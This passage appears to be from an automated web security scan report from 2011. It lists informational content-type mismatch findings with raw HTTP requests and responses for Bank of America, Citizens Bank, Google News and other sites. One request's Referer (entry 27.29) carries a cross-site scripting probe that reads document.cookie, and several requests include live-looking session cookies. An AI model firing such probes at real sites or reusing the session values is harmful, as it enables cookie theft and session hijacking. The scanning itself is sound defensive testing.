["",[],"","","","","",{}]

27.25. http://news.google.com/news/xhr/star  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://news.google.com
Path:   /news/xhr/star

Issue detail

The response contains the following Content-type statement:The response states that it contains JSON. However, it actually appears to contain plain text.

Request

GET /news/xhr/star HTTP/1.1
Host: news.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 400 Bad Request
Content-Type: application/json; charset=UTF-8
Date: Thu, 03 Feb 2011 01:03:48 GMT
Expires: Thu, 03 Feb 2011 01:03:48 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

{}

27.26. https://secure.opinionlab.com/pageviewer/pv_controlboard.html  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://secure.opinionlab.com
Path:   /pageviewer/pv_controlboard.html

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /pageviewer/pv_controlboard.html HTTP/1.1
Host: secure.opinionlab.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Length: 100
Content-Type: text/html
Last-Modified: Fri, 12 Jan 2007 19:33:13 GMT
Accept-Ranges: bytes
ETag: "4d9042808036c71:206b"
Date: Wed, 02 Feb 2011 22:02:29 GMT
Connection: close

<% Response.Redirect "https://pageviewer.opinionlab.com/pv_controlboard.html?url="&Request("url") %>

27.27. https://secure.opinionlab.com/rate36s.asp  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://secure.opinionlab.com
Path:   /rate36s.asp

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /rate36s.asp HTTP/1.1
Host: secure.opinionlab.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19
Content-Type: text/html
X-Powered-By: ASP.NET
Date: Wed, 02 Feb 2011 22:02:16 GMT
Connection: close

invalid call method

27.28. http://spd.netconversions.com/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://spd.netconversions.com
Path:   /

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET / HTTP/1.1
Host: spd.netconversions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Content-Length: 15
Date: Wed, 02 Feb 2011 22:00:02 GMT
Connection: close

File not found.

27.29. http://sr2.liveperson.net/hcp/html/mTag.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://sr2.liveperson.net
Path:   /hcp/html/mTag.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /hcp/html/mTag.js?site=44850650 HTTP/1.1
Host: sr2.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.retirement.merrilledge.com/IRA/pages/home.aspx?%009627c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eac0806a009c=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16101423669632,d=1294435351

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Content-Location: http://sales.liveperson.net/lpWeb/default_ENT//hcpv/emt/mtag.js?site=44850650
Last-Modified: Sun, 17 Oct 2010 14:38:28 GMT
Accept-Ranges: bytes
ETag: "80d542f686ecb1:1468"
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Date: Wed, 02 Feb 2011 22:21:34 GMT
Connection: close
Content-Length: 17314

eval((function(s){var a,c,e,i,j,o="",r,t=".....................................................................................................................$@^`~";for(i=0;i<s.length;i++){r=t+s[i][
...[SNIP]...

27.30. http://sr2.liveperson.net/visitor/addons/deploy.asp  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://sr2.liveperson.net
Path:   /visitor/addons/deploy.asp

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /visitor/addons/deploy.asp HTTP/1.1
Host: sr2.liveperson.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: LivePersonID=LP i=16101423669632,d=1294435351;

Response

HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Length: 403
Content-Type: text/html
Vary: Accept-Encoding
Cache-Control: private, max-age=86399
Date: Thu, 03 Feb 2011 01:04:59 GMT
Connection: close

<font face="Arial" size=2>
<p>Server.MapPath()</font> <font face="Arial" size=2>error 'ASP 0174 : 80004005'</font>
<p>
<font face="Arial" size=2>Invalid Path Character(s)</font>
<p>
<font face="Arial
...[SNIP]...

27.31. http://thehill.com/templates/thehill/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://thehill.com
Path:   /templates/thehill/favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /templates/thehill/favicon.ico HTTP/1.1
Host: thehill.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=il90fn3frs623bi5gtvigjk827; __qca=P0-629275191-1296696399668; __utmz=121351885.1296696400.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; __utma=121351885.1499307976.1296696400.1296696400.1296696400.1; __utmc=121351885; __utmb=121351885.1.10.1296696400; _chartbeat2=kmxm3zcwmj4c06uz

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:25:47 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 15 Sep 2009 12:35:10 GMT
ETag: "598ffb-e36-4739d0357fb80"
Accept-Ranges: bytes
Content-Length: 3638
Expires: Thu, 03 Feb 2011 01:27:46 GMT
Age: 126
Content-Type: text/plain; charset=UTF-8
Connection: close

..............h...&... ..............(....... ...........@.............................>......>....p......d(..V....T.......Z..........\........l..N...|I...J...|..U
...V...........z......>...I...F...i
...[SNIP]...

27.32. http://redcated/jaction/avevao_SOmainFooterIFrame_10  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://redcated
Path:   /jaction/avevao_SOmainFooterIFrame_10

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /jaction/avevao_SOmainFooterIFrame_10 HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Referer: http://usa.visa.com/?country=us&ep=v_gg_new&akamai=true
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 341
Content-Type: text/html
Expires: 0
Connection: close
Date: Wed, 02 Feb 2011 21:58:59 GMT

function AT_ws(d,p,c){if(typeof(d)!='undefined'&&d.createElement){var l=p=='http:'?'http://spd.netconversions.com/':'https://a248.e.akamai.net/atlas.download.akamai.com/';return ('<s'+'cript language=
...[SNIP]...

27.33. http://wareseeker.com/images/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://wareseeker.com
Path:   /images/favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /images/favicon.ico HTTP/1.1
Host: wareseeker.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:29:19 GMT
Server: Apache
Last-Modified: Tue, 15 Sep 2009 18:46:09 GMT
ETag: "19686c9-10be-473a232155e40"
Accept-Ranges: bytes
Content-Length: 4286
Content-Type: text/plain; charset=UTF-8

...... .... .........(... ...@..... ......%.................................................................=...PT..BF..8=..5<..:?..EI..^ax....o...!..................................................
...[SNIP]...

27.34. http://www.arbornetworks.com/en/contact-us.html  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.arbornetworks.com
Path:   /en/contact-us.html

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /en/contact-us.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:52:26 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Content-Length: 174
Connection: close
Content-Type: text/html

<br />
<b>Parse error</b>: syntax error, unexpected $end, expecting T_VARIABLE or '$' in <b>/usr/local/htdocs/components/com_sef/cache/cache.php</b> on line <b>45</b><br />

27.35. http://www.bankofamerica.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.bankofamerica.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.bankofamerica.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=D98FA69C2F17102F856AA91CC30F81BB; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; cmTPSet=Y; throttle_value=21; BIGipServerngen-www.80=480687787.20480.0000

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:04:37 GMT
Content-length: 1406
Content-type: text/plain
Last-modified: Thu, 01 Aug 2002 16:37:18 GMT
Etag: "57e-3d4963be"
Accept-ranges: bytes

..............h.......(....... ...........@...............................................................................................................k...H...%............z...b...Js..2P...........
...[SNIP]...

27.36. http://www.bankofamerica.com/global/images/new_Banklogo.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.bankofamerica.com
Path:   /global/images/new_Banklogo.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a JPEG image.

Request

GET /global/images/new_Banklogo.gif HTTP/1.1
Host: www.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://www.bankofamerica.com/findit/error.cgi
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=D98FA69C2F17102F856AA91CC30F81BB; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; cmTPSet=Y; throttle_value=21; BIGipServerngen-www.80=480687787.20480.0000

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:04:39 GMT
Content-length: 24065
Content-type: image/gif
Last-modified: Sun, 25 Oct 2009 17:09:06 GMT
Etag: "5e01-4ae48632"
Accept-ranges: bytes
Set-Cookie: BIGipServerngen-www.80=3108419243.20480.0000; path=/

......JFIF.....H.H....
.Exif..MM.*.............................b...........j.(...........1.........r.2...........i...............
....'..
....'.Adobe Photoshop CS3 Windows.2009:06:30 12:19:11.........
...[SNIP]...

27.37. https://www.bankofamerica.com/homepage/WidgetAction.go  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.bankofamerica.com
Path:   /homepage/WidgetAction.go

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /homepage/WidgetAction.go?requestType=display&divId=36094CED-7EDF-11DF-889C-00144F3EA4A4%2C360925D9-7EDF-11DF-889C-00144F3EA4A4%2C3608FEC5-7EDF-11DF-889C-00144F3EA4A4%2C36099B13-7EDF-11DF-889C-00144F3EA4A4&isWidget=true&targetedAdParams=%7B%7BmoduleId%3B%3BEQ%3B%3B36094CED-7EDF-11DF-889C-00144F3EA4A4%3B%3BATTRSEP%3B%3BcontentId%3B%3BEQ%3B%3B%24%7BCONTENT%7CD3AAA0A1-E38E-11DF-B16B-00144F3EA4A4%7D%3B%3BATTRSEP%3B%3BmoduleType%3B%3BEQ%3B%3Bhp-service-module%3B%3BATTRSEP%3B%3BdivId%3B%3BEQ%3B%3B36094CED-7EDF-11DF-889C-00144F3EA4A4%3B%3BATTRSEP%3B%3BfoundTargetedAd%3B%3BEQ%3B%3Bfalse%7D%7D%3B%3BMODSEP%3B%3B%7B%7BmoduleId%3B%3BEQ%3B%3B360925D9-7EDF-11DF-889C-00144F3EA4A4%3B%3BATTRSEP%3B%3BcontentId%3B%3BEQ%3B%3B%24%7BCONTENT%7C18A00502-E390-11DF-B16B-00144F3EA4A4%7D%3B%3BATTRSEP%3B%3BmoduleType%3B%3BEQ%3B%3Bhp-service-module%3B%3BATTRSEP%3B%3BdivId%3B%3BEQ%3B%3B360925D9-7EDF-11DF-889C-00144F3EA4A4%3B%3BATTRSEP%3B%3BfoundTargetedAd%3B%3BEQ%3B%3Bfalse%7D%7D%3B%3BMODSEP%3B%3B%7B%7BmoduleId%3B%3BEQ%3B%3B3608FEC5-7EDF-11DF-889C-00144F3EA4A4%3B%3BATTRSEP%3B%3BcontentId%3B%3BEQ%3B%3B%24%7BCONTENT%7CB48EEC16-0060-11DF-B411-00144F25F968%7D%3B%3BATTRSEP%3B%3BmoduleType%3B%3BEQ%3B%3Bhp-service-module%3B%3BATTRSEP%3B%3BdivId%3B%3BEQ%3B%3B3608FEC5-7EDF-11DF-889C-00144F3EA4A4%3B%3BATTRSEP%3B%3BfoundTargetedAd%3B%3BEQ%3B%3Bfalse%7D%7D%3B%3BMODSEP%3B%3B%7B%7BmoduleId%3B%3BEQ%3B%3B36099B13-7EDF-11DF-889C-00144F3EA4A4%3B%3BATTRSEP%3B%3BcontentId%3B%3BEQ%3B%3B%24%7BCONTENT%7C3619DDB0-E38E-11DF-B16B-00144F3EA4A4%7D%3B%3BATTRSEP%3B%3BmoduleType%3B%3BEQ%3B%3Bhp-media-module%3B%3BATTRSEP%3B%3BdivId%3B%3BEQ%3B%3B36099B13-7EDF-11DF-889C-00144F3EA4A4%3B%3BATTRSEP%3B%3BfoundTargetedAd%3B%3BEQ%3B%3Bfalse%7D%7D&previousPageId=3601F9E2-7EDF-11DF-889C-00144F3EA4A4&callback=jsonp1296684089276&_=1296684100174 HTTP/1.1
Host: www.bankofamerica.com
Connection: keep-alive
Referer: https://www.bankofamerica.com/
X-Requested-With: XMLHttpRequest
Accept: text/javascript, application/javascript, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=D98FA69C2F17102F856AA91CC30F81BB; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; throttle_value=21; cmTPSet=Y

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:00:44 GMT
Server: IBM_HTTP_Server
Cache-Control: no-cache
Via: On-Demand Router/1.0
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 4735

jsonp1296684089276({widgetdata:[{htmlsrc:'                                                     <!-- sm1.2one -->                                                        <div class="links-list-module">    <div class="column-co
...[SNIP]...

27.38. https://www.bankofamerica.com/homepage/overview  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.bankofamerica.com
Path:   /homepage/overview

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /homepage/overview HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 22:04:43 GMT
Server: IBM_HTTP_Server
Via: On-Demand Router/1.0
Content-Length: 48
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Language: en-US

Error 404: SRVE0190E: File not found: /overview

27.39. https://www.capitalone.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.capitalone.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.capitalone.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpl_capitalone.com_443=745088266.65056.0000; v1st=FBBE6C4A1C9B8436; itc=CAPITALONE11NZZZintmktgD4; caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000; smartTracking=

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:00:52 GMT
Server: Apache
Cache-Control: no-cache, no-store, must-revalidate
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Tue, 05 Feb 2008 20:19:43 GMT
Accept-Ranges: bytes
Content-Length: 894
Vary: User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Keep-Alive: timeout=5, max=50
Connection: Keep-Alive
Content-Type: text/plain; charset=ISO-8859-1

..............h.......(....... ...............................................V..j$...........................vp.................^..R...W........................vp.xr..............f..R..`.............
...[SNIP]...

27.40. http://www.charterone.com/ajax/Citizens.CmsSite.Web.Cms.Templates.v2.Common.CommonHeader,Citizens.CmsSite.Web.ashx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.charterone.com
Path:   /ajax/Citizens.CmsSite.Web.Cms.Templates.v2.Common.CommonHeader,Citizens.CmsSite.Web.ashx

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /ajax/Citizens.CmsSite.Web.Cms.Templates.v2.Common.CommonHeader,Citizens.CmsSite.Web.ashx HTTP/1.1
Host: www.charterone.com
Proxy-Connection: keep-alive
Referer: http://www.charterone.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 21:59:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Expires: Wed, 02 Feb 2011 21:59:51 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 2532


// cached javascript
var CommonHeader = {
RegionLookup:function(zip,callback,context){return new ajax_request(this.url + '?_method=RegionLookup&_session=no','zip=' + enc(zip),callback, context);},
...[SNIP]...

27.41. http://www.charterone.com/ajax/common.ashx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.charterone.com
Path:   /ajax/common.ashx

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /ajax/common.ashx HTTP/1.1
Host: www.charterone.com
Proxy-Connection: keep-alive
Referer: http://www.charterone.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 21:59:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Expires: Wed, 02 Feb 2011 22:00:51 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 2991

var requests = new Array();

if(typeof(XMLHttpRequest) == 'undefined')
var XMLHttpRequest = function()
{
   var request = null;
   try
   {
       request = new ActiveXObject('Msxml2.XMLHTTP');
   }
   cat
...[SNIP]...

27.42. http://www.charterone.com/images/standard-od.png  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.charterone.com
Path:   /images/standard-od.png

Issue detail

The response contains the following Content-type statement:The response states that it contains a PNG image. However, it actually appears to contain a JPEG image.

Request

GET /images/standard-od.png HTTP/1.1
Host: www.charterone.com
Proxy-Connection: keep-alive
Referer: http://www.charterone.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 89662
Content-Type: image/png
Last-Modified: Fri, 13 Aug 2010 16:14:06 GMT
Accept-Ranges: bytes
ETag: "0db7d8d23bcb1:240"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 02 Feb 2011 21:59:51 GMT

......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i...............
....'..
....'.Adobe Photoshop CS4 Macintosh.2010:08:04 16:29:57.......
...[SNIP]...

27.43. http://www.citizensbank.com/ajax/Citizens.CmsSite.Web.Cms.Templates.v2.Common.CommonHeader,Citizens.CmsSite.Web.ashx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.citizensbank.com
Path:   /ajax/Citizens.CmsSite.Web.Cms.Templates.v2.Common.CommonHeader,Citizens.CmsSite.Web.ashx

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /ajax/Citizens.CmsSite.Web.Cms.Templates.v2.Common.CommonHeader,Citizens.CmsSite.Web.ashx HTTP/1.1
Host: www.citizensbank.com
Proxy-Connection: keep-alive
Referer: http://www.citizensbank.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 2532
Content-Type: text/plain; charset=utf-8
Expires: Wed, 02 Feb 2011 22:00:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Wed, 02 Feb 2011 22:00:01 GMT


// cached javascript
var CommonHeader = {
RegionLookup:function(zip,callback,context){return new ajax_request(this.url + '?_method=RegionLookup&_session=no','zip=' + enc(zip),callback, context);},
...[SNIP]...

27.44. http://www.citizensbank.com/ajax/common.ashx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.citizensbank.com
Path:   /ajax/common.ashx

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /ajax/common.ashx HTTP/1.1
Host: www.citizensbank.com
Proxy-Connection: keep-alive
Referer: http://www.citizensbank.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 2991
Content-Type: text/plain; charset=utf-8
Expires: Wed, 02 Feb 2011 22:01:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Wed, 02 Feb 2011 22:00:01 GMT

var requests = new Array();

if(typeof(XMLHttpRequest) == 'undefined')
var XMLHttpRequest = function()
{
   var request = null;
   try
   {
       request = new ActiveXObject('Msxml2.XMLHTTP');
   }
   cat
...[SNIP]...

27.45. http://www.citizensbank.com/images/standard-od.png  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.citizensbank.com
Path:   /images/standard-od.png

Issue detail

The response contains the following Content-type statement:The response states that it contains a PNG image. However, it actually appears to contain a JPEG image.

Request

GET /images/standard-od.png HTTP/1.1
Host: www.citizensbank.com
Proxy-Connection: keep-alive
Referer: http://www.citizensbank.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 89662
Content-Type: image/png
Last-Modified: Fri, 13 Aug 2010 16:14:06 GMT
